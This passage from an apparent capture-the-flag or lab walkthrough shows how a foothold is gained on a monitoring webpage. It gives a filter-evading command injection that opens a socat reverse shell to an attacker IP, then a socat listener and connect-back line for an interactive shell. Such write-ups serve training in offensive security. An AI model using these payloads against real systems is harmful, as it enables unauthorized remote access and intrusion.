Foothold

Where we left from the monitoring.inlanefreigt.local webpage. We can use the following page to get a reverse shell. After the ip and on a new line:

's'o'c'a't'${IFS}TCP4:10.10.15.244:8443${IFS}EXEC:bash

We get a simple shell back. Now we need to get an interactive shell. We will use the socat method.

Starting a socat listener

socat file:`tty`,raw,echo=0 tcp-listen:4443

On the simple shell we type:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.15.244:4443

Last updated 1 year ago